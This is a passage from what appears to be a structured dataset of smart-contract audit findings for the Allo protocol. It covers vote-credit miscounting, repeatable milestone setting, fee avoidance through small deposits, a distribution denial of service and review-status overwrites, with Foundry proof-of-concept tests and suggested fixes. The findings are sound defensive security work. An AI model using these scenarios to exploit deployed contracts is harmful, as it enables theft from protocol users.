a scenario where a user allocates credits in three separate transactions:\\nTransaction 1: Allocates 5 credits\\ncreditsCastToRecipient initially is 0\\ntotalCredits = 5 (5 + 0)\\nNew voiceCreditsCastToRecipient[_recipientId] = 5\\nTransaction 2: Allocates another 5 credits\\ncreditsCastToRecipient now is 5 (from previous transaction)\\ntotalCredits = 10 (5 + 5)\\nNew voiceCreditsCastToRecipient[_recipientId] = 15 (10 + 5)\\nTransaction 3: Allocates another 5 credits\\ncreditsCastToRecipient now is 15\\ntotalCredits = 20 (5 + 15)\\nNew voiceCreditsCastToRecipient[_recipientId] = 35 (20 + 15)\\nFrom the above, we can see that the voice credits cast to the recipient are exponentially growing with each transaction instead of linearly increasing by 5 each time",Code should be modified to only add the new voice credits to the recipient's tally. The modified line of code should look like:\\n```\\n_allocator.voiceCreditsCastToRecipient[_recipientId] += _voiceCreditsToAllocate;\\n```\\n,"Exponential increase in the voice credits attributed to a recipient, significantly skewing the results of the voting strategy( if one recipient receive 15 votes in one vote and another one receive 5 votes 3 times, the second one will have 20 votes and the first one 15) Over time, this could allow for manipulation and loss of trust in the voting mechanism and the percentage of amount received by recipients as long as allocations are used to calculate the match amount they will receive from the pool amount.",```\\nfunction _qv_allocate(\\n // rest of code\\n ) internal onlyActiveAllocation {\\n // rest of code\\n uint256 creditsCastToRecipient = _allocator.voiceCreditsCastToRecipient[_recipientId];\\n // rest of code\\n // get the total credits and calculate the vote result\\n uint256 totalCredits = _voiceCreditsToAllocate + creditsCastToRecipient;\\n // rest of code\\n //E update allocator mapping voice for this recipient\\n _allocator.voiceCreditsCastToRecipient[_recipientId] += totalCredits; //E @question should be only _voiceCreditsToAllocate\\n // rest of code\\n }\\n```\\n +RFPSimpleStrategy milestones can be set multiple times,medium,"The `setMilestones` function in `RFPSimpleStrategy` contract checks if `MILESTONES_ALREADY_SET` or not by `upcomingMilestone` index.\\n```\\nif (upcomingMilestone != 0) revert MILESTONES_ALREADY_SET();\\n```\\n\\nBut `upcomingMilestone` increases only after distribution, and until this time will always be equal to 0.",Fix condition if milestones should only be set once.\\n```\\nif (milestones.length > 0) revert MILESTONES_ALREADY_SET();\\n```\\n\\nOr allow milestones to be reset while they are not in use.\\n```\\nif (milestones.length > 0) {\\n if (milestones[0].milestoneStatus != Status.None) revert MILESTONES_ALREADY_IN_USE();\\n delete milestones;\\n}\\n```\\n,"It can accidentally break the pool state or be used with malicious intentions.\\nTwo managers accidentally set the same milestones. Milestones are duplicated and can't be reset, the pool needs to be recreated.\\nThe manager, in cahoots with the recipient, sets milestones one by one, thereby bypassing `totalAmountPercentage` check and increasing the payout amount.",```\\nif (upcomingMilestone != 0) revert MILESTONES_ALREADY_SET();\\n```\\n +Allo#_fundPool,medium,"Let's see the code of the `_fundPool` function:\\n```\\nfunction _fundPool(uint256 _amount, uint256 _poolId, IStrategy _strategy) internal {\\n uint256 feeAmount;\\n uint256 amountAfterFee = _amount;\\n\\n Pool storage pool = pools[_poolId];\\n address _token = pool.token;\\n\\n if (percentFee > 0) {\\n feeAmount = (_amount * percentFee) / getFeeDenominator();\\n amountAfterFee -= feeAmount;\\n\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: treasury, amount: feeAmount}));\\n }\\n\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: address(_strategy), amount: amountAfterFee}));\\n _strategy.increasePoolAmount(amountAfterFee);\\n\\n emit PoolFunded(_poolId, amountAfterFee, feeAmount);\\n }\\n```\\n\\nThe `feeAmount` is calculated as follows:\\n```\\nfeeAmount = (_amount * percentFee) / getFeeDenominator();\\n```\\n\\nwhere `getFeeDenominator` returns `1e18` and `percentFee` is represented like that: `1e18` = 100%, 1e17 = 10%, 1e16 = 1%, 1e15 = 0.1% (from the comments when declaring the variable).\\nLet's say the pool uses a token like GeminiUSD which is a token with 300M+ market cap, so it's widely used, and `percentFee` == 1e15 (0.1%)\\nA user could circumvent the fee by depositing a relatively small amount. In our example, he can deposit 9 GeminiUSD. In that case, the calculation will be: `feeAmount = (_amount * percentFee) / getFeeDenominator() = (9e2 * 1e15) / 1e18 = 9e17/1e18 = 9/10 = 0;`\\nSo the user ends up paying no fee. There is nothing stopping the user from funding his pool by invoking the `fundPool` with such a small amount as many times as he needs to fund the pool with whatever amount he chooses, circumventing the fee.\\nEspecially with the low gas fees on L2s on which the protocol will be deployed, this will be a viable method to fund a pool without paying any fee to the protocol.",Add a `minFundAmount` variable and check for it when funding a pool.,The protocol doesn't collect fees from pools with low decimal tokens.,"```\\nfunction _fundPool(uint256 _amount, uint256 _poolId, IStrategy _strategy) internal {\\n uint256 feeAmount;\\n uint256 amountAfterFee = _amount;\\n\\n Pool storage pool = pools[_poolId];\\n address _token = pool.token;\\n\\n if (percentFee > 0) {\\n feeAmount = (_amount * percentFee) / getFeeDenominator();\\n amountAfterFee -= feeAmount;\\n\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: treasury, amount: feeAmount}));\\n }\\n\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: address(_strategy), amount: amountAfterFee}));\\n _strategy.increasePoolAmount(amountAfterFee);\\n\\n emit PoolFunded(_poolId, amountAfterFee, feeAmount);\\n }\\n```\\n" +The `RFPSimpleStrategy._registerRecipient()` does not work when the strategy was created using the `useRegistryAnchor=true` causing that nobody can register to the pool,medium,"The `RFPSimpleStrategy` strategies can be created using the `useRegistryAnchor` which indicates whether to use the registry anchor or not. If the pool is created using the `useRegistryAnchor=true` the RFPSimpleStrategy._registerRecipient() will be reverted by RECIPIENT_ERROR. The problem is that when `useRegistryAnchor` is true, the variable recipientAddress is not collected so the function will revert by the RECIPIENT_ERROR.\\nI created a test where the strategy is created using the `userRegistryAnchor=true` then the `registerRecipient()` will be reverted by the `RECIPIENT_ERROR`.\\n```\\n// File: test/foundry/strategies/RFPSimpleStrategy.t.sol:RFPSimpleStrategyTest\\n// $ forge test --match-test ""test_registrationIsBlockedWhenThePoolIsCreatedWithUseRegistryIsTrue"" -vvv\\n//\\n function test_registrationIsBlockedWhenThePoolIsCreatedWithUseRegistryIsTrue() public {\\n // The registerRecipient() function does not work then the strategy was created using the\\n // useRegistryAnchor = true.\\n //\\n bool useRegistryAnchorTrue = true;\\n RFPSimpleStrategy custom_strategy = new RFPSimpleStrategy(address(allo()), ""RFPSimpleStrategy"");\\n\\n vm.prank(pool_admin());\\n poolId = allo().createPoolWithCustomStrategy(\\n poolProfile_id(),\\n address(custom_strategy),\\n abi.encode(maxBid, useRegistryAnchorTrue, metadataRequired),\\n NATIVE,\\n 0,\\n poolMetadata,\\n pool_managers()\\n );\\n //\\n // Create profile1 metadata and anchor\\n Metadata memory metadata = Metadata({protocol: 1, pointer: ""metadata""});\\n address anchor = profile1_anchor();\\n bytes memory data = abi.encode(anchor, 1e18, metadata);\\n //\\n // Profile1 member registers to the pool but it reverted by RECIPIENT_ERROR\\n vm.startPrank(address(profile1_member1()));\\n vm.expectRevert(abi.encodeWithSelector(RECIPIENT_ERROR.selector, address(anchor)));\\n allo().registerRecipient(poolId, data);\\n }\\n```\\n","When the strategy is using `useRegistryAncho=true`, get the `recipientAddress` from the data:\\n```\\n function _registerRecipient(bytes memory _data, address _sender)\\n internal\\n override\\n onlyActivePool\\n returns (address recipientId)\\n {\\n bool isUsingRegistryAnchor;\\n address recipientAddress;\\n address registryAnchor;\\n uint256 proposalBid;\\n Metadata memory metadata;\\n\\n // Decode '_data' depending on the 'useRegistryAnchor' flag\\n if (useRegistryAnchor) {\\n /// @custom:data when 'true' // Remove the line below\\n> (address recipientId, uint256 proposalBid, Metadata metadata)\\n// Remove the line below\\n// Remove the line below\\n (recipientId, proposalBid, metadata) = abi.decode(_data, (address, uint256, Metadata));\\n// Add the line below\\n// Add the line below\\n (recipientId, recipientAddress, proposalBid, metadata) = abi.decode(_data, (address, address, uint256, Metadata));\\n\\n // If the sender is not a profile member this will revert\\n if (!_isProfileMember(recipientId, _sender)) revert UNAUTHORIZED();\\n```\\n","The pool created with a strategy using the `userRegistryAnchor=true` can not get `registrants` because `_registerRecipient()` will be reverted all the time. If the pool is funded but no one can be allocated since there is not registered recipients, the deposited funds by others may be trapped because those are not distributed since there are not `registrants`.","```\\n// File: test/foundry/strategies/RFPSimpleStrategy.t.sol:RFPSimpleStrategyTest\\n// $ forge test --match-test ""test_registrationIsBlockedWhenThePoolIsCreatedWithUseRegistryIsTrue"" -vvv\\n//\\n function test_registrationIsBlockedWhenThePoolIsCreatedWithUseRegistryIsTrue() public {\\n // The registerRecipient() function does not work then the strategy was created using the\\n // useRegistryAnchor = true.\\n //\\n bool useRegistryAnchorTrue = true;\\n RFPSimpleStrategy custom_strategy = new RFPSimpleStrategy(address(allo()), ""RFPSimpleStrategy"");\\n\\n vm.prank(pool_admin());\\n poolId = allo().createPoolWithCustomStrategy(\\n poolProfile_id(),\\n address(custom_strategy),\\n abi.encode(maxBid, useRegistryAnchorTrue, metadataRequired),\\n NATIVE,\\n 0,\\n poolMetadata,\\n pool_managers()\\n );\\n //\\n // Create profile1 metadata and anchor\\n Metadata memory metadata = Metadata({protocol: 1, pointer: ""metadata""});\\n address anchor = profile1_anchor();\\n bytes memory data = abi.encode(anchor, 1e18, metadata);\\n //\\n // Profile1 member registers to the pool but it reverted by RECIPIENT_ERROR\\n vm.startPrank(address(profile1_member1()));\\n vm.expectRevert(abi.encodeWithSelector(RECIPIENT_ERROR.selector, address(anchor)));\\n allo().registerRecipient(poolId, data);\\n }\\n```\\n" +`_distribute()` function in RFPSimpleStrategy contract has wrong requirement causing DOS,medium,"The function _distribute():\\n```\\n function _distribute(address[] memory, bytes memory, address _sender)\\n internal\\n virtual\\n override\\n onlyInactivePool\\n onlyPoolManager(_sender)\\n {\\n // rest of code\\n\\n IAllo.Pool memory pool = allo.getPool(poolId);\\n Milestone storage milestone = milestones[upcomingMilestone];\\n Recipient memory recipient = _recipients[acceptedRecipientId];\\n\\n if (recipient.proposalBid > poolAmount) revert NOT_ENOUGH_FUNDS();\\n\\n uint256 amount = (recipient.proposalBid * milestone.amountPercentage) / 1e18;\\n\\n poolAmount -= amount;//<@@ NOTICE the poolAmount get decrease over time\\n\\n _transferAmount(pool.token, recipient.recipientAddress, amount);\\n\\n // rest of code\\n }\\n```\\n\\nLet's suppose this scenario:\\nPool manager funding the contract with 100 token, making `poolAmount` variable equal to 100\\nPool manager set 5 equal milestones with 20% each\\nSelected recipient's proposal bid is 100, making `recipients[acceptedRecipientId].proposalBid` variable equal to 100\\nAfter milestone 1 done, pool manager pays recipient using `distribute()`. Value of variables after: `poolAmount = 80 ,recipients[acceptedRecipientId].proposalBid = 100`\\nAfter milestone 2 done, pool manager will get DOS trying to pay recipient using `distribute()` because of this line:\\n```\\nif (recipient.proposalBid > poolAmount) revert NOT_ENOUGH_FUNDS();\\n```\\n",```\\n- if (recipient.proposalBid > poolAmount) revert NOT_ENOUGH_FUNDS();\\n+ if ((recipient.proposalBid * milestone.amountPercentage) / 1e18 > poolAmount) revert NOT_ENOUGH_FUNDS();\\n```\\n,This behaviour will cause DOS when distributing the 2nd milestone or higher,"```\\n function _distribute(address[] memory, bytes memory, address _sender)\\n internal\\n virtual\\n override\\n onlyInactivePool\\n onlyPoolManager(_sender)\\n {\\n // rest of code\\n\\n IAllo.Pool memory pool = allo.getPool(poolId);\\n Milestone storage milestone = milestones[upcomingMilestone];\\n Recipient memory recipient = _recipients[acceptedRecipientId];\\n\\n if (recipient.proposalBid > poolAmount) revert NOT_ENOUGH_FUNDS();\\n\\n uint256 amount = (recipient.proposalBid * milestone.amountPercentage) / 1e18;\\n\\n poolAmount -= amount;//<@@ NOTICE the poolAmount get decrease over time\\n\\n _transferAmount(pool.token, recipient.recipientAddress, amount);\\n\\n // rest of code\\n }\\n```\\n" +"`QVBaseStrategy::reviewRecipients()` doesn't check if the recipient is already accepted or rejected, and overwrites the current status",medium,"In the QV strategy contracts, recipients register themselves and wait for a pool manager to accept the registration. Pool managers can accept or reject recipients with the `reviewRecipients()` function. There is also a threshold (reviewThreshold) for recipients to be accepted. For example, if the `reviewThreshold` is 2, a pending recipient gets accepted when two managers accept this recipient and the `recipientStatus` is updated.\\nHowever, `QVBaseStrategy::reviewRecipients()` function doesn't check the recipient's current status. This one alone may not be an issue because managers may want to change the status of the recipient etc.\\nBut on top of that, the function also doesn't take the previous review counts into account when updating the status, and overwrites the status immediately after reaching the threshold. I'll share a scenario later about this below.\\n```\\nfile: QVBaseStrategy.sol\\n function reviewRecipients(address[] calldata _recipientIds, Status[] calldata _recipientStatuses)\\n external\\n virtual\\n onlyPoolManager(msg.sender)\\n onlyActiveRegistration\\n {\\n // make sure the arrays are the same length\\n uint256 recipientLength = _recipientIds.length;\\n if (recipientLength != _recipientStatuses.length) revert INVALID();\\n\\n for (uint256 i; i < recipientLength;) {\\n Status recipientStatus = _recipientStatuses[i];\\n address recipientId = _recipientIds[i];\\n\\n // if the status is none or appealed then revert\\n if (recipientStatus == Status.None || recipientStatus == Status.Appealed) { //@audit these are the input parameter statuse not the recipient's status.\\n revert RECIPIENT_ERROR(recipientId);\\n }\\n\\n reviewsByStatus[recipientId][recipientStatus]++;\\n\\n --> if (reviewsByStatus[recipientId][recipientStatus] >= reviewThreshold) { //@audit recipientStatus is updated right after the threshold is reached. It can overwrite if the status is already set.\\n Recipient storage recipient = recipients[recipientId];\\n recipient.recipientStatus = recipientStatus;\\n\\n emit RecipientStatusUpdated(recipientId, recipientStatus, address(0));\\n }\\n\\n emit Reviewed(recipientId, recipientStatus, msg.sender);\\n\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n```\\n\\nAs I mentioned above, the function updates the `recipientStatus` immediately after reaching the threshold. Here is a scenario of why this might be an issue.\\nExample Scenario\\nThe pool has 5 managers and the `reviewThreshold` is 2.\\nThe first manager rejects the recipient\\nThe second manager accepts the recipient\\nThe third manager rejects the recipient. -> `recipientStatus` updated -> `status = REJECTED`\\nThe fourth manager rejects the recipient -> status still `REJECTED`\\nThe last manager accepts the recipient ->recipientStatus updated again -> `status = ACCEPTED`\\n3 managers rejected and 2 managers accepted the recipient but the recipient status is overwritten without checking the recipient's previous status and is ACCEPTED now.\\nCoded PoC\\nYou can prove the scenario above with the PoC. You can use the protocol's own setup for this.\\n- Copy the snippet below and paste it into the `QVBaseStrategy.t.sol` test file.\\n- Run forge test `--match-test test_reviewRecipient_reviewTreshold_OverwriteTheLastOne`\\n```\\n//@audit More managers rejected but the recipient is accepted\\n function test_reviewRecipient_reviewTreshold_OverwriteTheLastOne() public virtual {\\n address recipientId = __register_recipient();\\n\\n // Create rejection status\\n address[] memory recipientIds = new address[](1);\\n recipientIds[0] = recipientId;\\n IStrategy.Status[] memory Statuses = new IStrategy.Status[](1);\\n Statuses[0] = IStrategy.Status.Rejected;\\n\\n // Reject three times with different managers\\n vm.startPrank(pool_manager1());\\n qvStrategy().reviewRecipients(recipientIds, Statuses);\\n\\n vm.startPrank(pool_manager2());\\n qvStrategy().reviewRecipients(recipientIds, Statuses);\\n\\n vm.startPrank(pool_manager3());\\n qvStrategy().reviewRecipients(recipientIds, Statuses);\\n\\n // Three managers rejected. Status will be rejected.\\n assertEq(uint8(qvStrategy().getRecipientStatus(recipientId)), uint8(IStrategy.Status.Rejected));\\n assertEq(qvStrategy().reviewsByStatus(recipientId, IStrategy.Status.Rejected), 3);\\n\\n // Accept two times after three rejections\\n Statuses[0] = IStrategy.Status.Accepted;\\n vm.startPrank(pool_admin());\\n qvStrategy().reviewRecipients(recipientIds, Statuses);\\n\\n vm.startPrank(pool_manager4());\\n qvStrategy().reviewRecipients(recipientIds, Statuses);\\n\\n // 3 Rejected, 2 Accepted, but status is Accepted because it overwrites right after passing threshold.\\n assertEq(uint8(qvStrategy().getRecipientStatus(recipientId)), uint8(IStrategy.Status.Accepted));\\n assertEq(qvStrategy().reviewsByStatus(recipientId, IStrategy.Status.Rejected), 3);\\n assertEq(qvStrategy().reviewsByStatus(recipientId, IStrategy.Status.Accepted), 2);\\n }\\n```\\n\\nYou can find the test results below:\\n```\\nRunning 1 test for test/foundry/strategies/QVSimpleStrategy.t.sol:QVSimpleStrategyTest\\n[PASS] test_reviewRecipient_reviewTreshold_OverwriteTheLastOne() (gas: 249604)\\nTest result: ok. 1 passed; 0 failed; 0 skipped; finished in 10.92ms\\n```\\n",Checking the review counts before updating the state might be helpful to mitigate this issue,Recipient status might be overwritten with less review counts.,"```\\nfile: QVBaseStrategy.sol\\n function reviewRecipients(address[] calldata _recipientIds, Status[] calldata _recipientStatuses)\\n external\\n virtual\\n onlyPoolManager(msg.sender)\\n onlyActiveRegistration\\n {\\n // make sure the arrays are the same length\\n uint256 recipientLength = _recipientIds.length;\\n if (recipientLength != _recipientStatuses.length) revert INVALID();\\n\\n for (uint256 i; i < recipientLength;) {\\n Status recipientStatus = _recipientStatuses[i];\\n address recipientId = _recipientIds[i];\\n\\n // if the status is none or appealed then revert\\n if (recipientStatus == Status.None || recipientStatus == Status.Appealed) { //@audit these are the input parameter statuse not the recipient's status.\\n revert RECIPIENT_ERROR(recipientId);\\n }\\n\\n reviewsByStatus[recipientId][recipientStatus]++;\\n\\n --> if (reviewsByStatus[recipientId][recipientStatus] >= reviewThreshold) { //@audit recipientStatus is updated right after the threshold is reached. It can overwrite if the status is already set.\\n Recipient storage recipient = recipients[recipientId];\\n recipient.recipientStatus = recipientStatus;\\n\\n emit RecipientStatusUpdated(recipientId, recipientStatus, address(0));\\n }\\n\\n emit Reviewed(recipientId, recipientStatus, msg.sender);\\n\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n```\\n" +CREATE3 is not available in the zkSync Era.,medium,"The zkSync Era docs explain how it differs from Ethereum.\\nPOC:\\n```\\n// SPDX-License-Identifier: Unlicensed\\npragma solidity ^0.8.0;\\n\\nimport ""./MiniContract.sol"";\\nimport ""./CREATE3.sol"";\\n\\ncontract DeployTest {\\n address public deployedAddress;\\n event Deployed(address);\\n \\n function generateContract() public returns(address, address) {\\n bytes32 salt = keccak256(""SALT"");\\n\\n address preCalculatedAddress = CREATE3.getDeployed(salt);\\n\\n // check if the contract has already been deployed by checking code size of address\\n bytes memory creationCode = abi.encodePacked(type(MiniContract).creationCode, abi.encode(777));\\n\\n // Use CREATE3 to deploy the anchor contract\\n address deployed = CREATE3.deploy(salt, creationCode, 0);\\n return (preCalculatedAddress, deployed);\\n }\\n}\\n```\\n\\nAlso, the logic to compute the address of Create2 is different from Ethereum, as shown below, so the CREATE3 library cannot be used as it is.\\nThis cause registry returns an incorrect `preCalculatedAddress`, causing the anchor to be registered to an address that is not the actual deployed address.\\n```\\naddress ⇒ keccak256( \\n keccak256(""zksyncCreate2"") ⇒ 0x2020dba91b30cc0006188af794c2fb30dd8520db7e2c088b7fc7c103c00ca494, \\n sender, \\n salt, \\n keccak256(bytecode), \\n keccak256(constructorInput)\\n ) \\n```\\n","This can be solved by implementing CREATE2 directly instead of CREATE3 and using `type(Anchor).creationCode`. Also, the compute address logic needs to be modified for zkSync.","`generateAnchor` doesn't work, so user can't do anything related to anchor.","```\\n// SPDX-License-Identifier: Unlicensed\\npragma solidity ^0.8.0;\\n\\nimport ""./MiniContract.sol"";\\nimport ""./CREATE3.sol"";\\n\\ncontract DeployTest {\\n address public deployedAddress;\\n event Deployed(address);\\n \\n function generateContract() public returns(address, address) {\\n bytes32 salt = keccak256(""SALT"");\\n\\n address preCalculatedAddress = CREATE3.getDeployed(salt);\\n\\n // check if the contract has already been deployed by checking code size of address\\n bytes memory creationCode = abi.encodePacked(type(MiniContract).creationCode, abi.encode(777));\\n\\n // Use CREATE3 to deploy the anchor contract\\n address deployed = CREATE3.deploy(salt, creationCode, 0);\\n return (preCalculatedAddress, deployed);\\n }\\n}\\n```\\n" +Anchor contract is unable to receive NFTs of any kind,medium,"Anchor.sol essentially works like a wallet, and also attached to profile to give it extra credibility and profile owner more functionality.\\nAs intended this contract will receive nfts, from different strategies and protocols. However, as it is currently implemented thee contracts will not be able to receive NFTs sent with safeTransferFrom(), because they do not implement the necessary functions to safely receive these tokens..\\nWhile in many cases such a situation would be Medium severity, looking at these wallets will be used could lead to more serious consequences. For example, having an anchor that is entitled to high value NFTs but is not able to receive them is clearly a loss of funds risk, and a High severity issue.\\nimplement the onERC721Received() and onERC1155Received() functions in following code:\\n```\\n// SPDX-License-Identifier: AGPL-3.0-only\\npragma solidity 0.8.19;\\n\\n// Core Contracts\\nimport {Registry} from ""./Registry.sol"";\\n\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⢿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣿⣿⣿⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⡟⠘⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⣀⣴⣾⣿⣿⣿⣿⣾⠻⣿⣿⣿⣿⣿⣿⣿⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⡿⠀⠀⠸⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⢀⣠⣴⣴⣶⣶⣶⣦⣦⣀⡀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⣴⣿⣿⣿⣿⣿⣿⡿⠃⠀⠙⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⠁⠀⠀⠀⢻⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⡀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀⠀⠘⣿⣿⣿⣿⣿⡿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⠃⠀⠀⠀⠀⠈⢿⣿⣿⣿⣆⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⣰⣿⣿⣿⡿⠋⠁⠀⠀⠈⠘⠹⣿⣿⣿⣿⣆⠀⠀⠀\\n// ⠀⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⡿⠀⠀⠀⠀⠀⠀⠈⢿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣾⣿⣿⣿⠏⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⢰⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⡀⠀⠀\\n// ⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣟⠀⡀⢀⠀⡀⢀⠀⡀⢈⢿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⡇⠀⠀\\n// ⠀⠀⣠⣿⣿⣿⣿⣿⣿⡿⠋⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⡿⢿⠿⠿⠿⠿⠿⠿⠿⠿⠿⢿⣿⣿⣿⣷⡀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠸⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⠂⠀⠀\\n// ⠀⠀⠙⠛⠿⠻⠻⠛⠉⠀⠀⠈⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢿⣿⣿⣿⣧⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⢻⣿⣿⣿⣷⣀⢀⠀⠀⠀⡀⣰⣾⣿⣿⣿⠏⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠛⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⢰⣿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣧⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠹⢿⣿⣿⣿⣿⣾⣾⣷⣿⣿⣿⣿⡿⠋⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⠙⠋⠛⠙⠋⠛⠙⠋⠛⠙⠋⠃⠀⠀⠀⠀⠀⠀⠀⠀⠠⠿⠻⠟⠿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⠟⠿⠟⠿⠆⠀⠸⠿⠿⠟⠯⠀⠀⠀⠸⠿⠿⠿⠏⠀⠀⠀⠀⠀⠈⠉⠻⠻⡿⣿⢿⡿⡿⠿⠛⠁⠀⠀⠀⠀⠀⠀\\n// allo.gitcoin.co\\n\\n/// @title Anchor contract\\n/// @author @thelostone-mc , @0xKurt , @codenamejason , @0xZakk , @nfrgosselin \\n/// @notice Anchors are associated with profiles and are accessible exclusively by the profile owner. This contract ensures secure\\n/// and authorized interaction with external addresses, enhancing the capabilities of profiles and enabling controlled\\n/// execution of operations. The contract leverages the `Registry` contract for ownership verification and access control.\\ncontract Anchor {\\n /// ==========================\\n /// === Storage Variables ====\\n /// ==========================\\n\\n /// @notice The registry contract on any given network/chain\\n Registry public immutable registry;\\n\\n /// @notice The profileId of the allowed profile to execute calls\\n bytes32 public immutable profileId;\\n\\n /// ==========================\\n /// ======== Errors ==========\\n /// ==========================\\n\\n /// @notice Throws when the caller is not the owner of the profile\\n error UNAUTHORIZED();\\n\\n /// @notice Throws when the call to the target address fails\\n error CALL_FAILED();\\n\\n /// ==========================\\n /// ======= Constructor ======\\n /// ==========================\\n\\n /// @notice Constructor\\n /// @dev We create an instance of the 'Registry' contract using the 'msg.sender' and set the profileId.\\n /// @param _profileId The ID of the allowed profile to execute calls\\n constructor(bytes32 _profileId) {\\n registry = Registry(msg.sender);\\n profileId = _profileId;\\n }\\n\\n /// ==========================\\n /// ======== External ========\\n /// ==========================\\n\\n /// @notice Execute a call to a target address\\n /// @dev 'msg.sender' must be profile owner\\n /// @param _target The target address to call\\n /// @param _value The amount of native token to send\\n /// @param _data The data to send 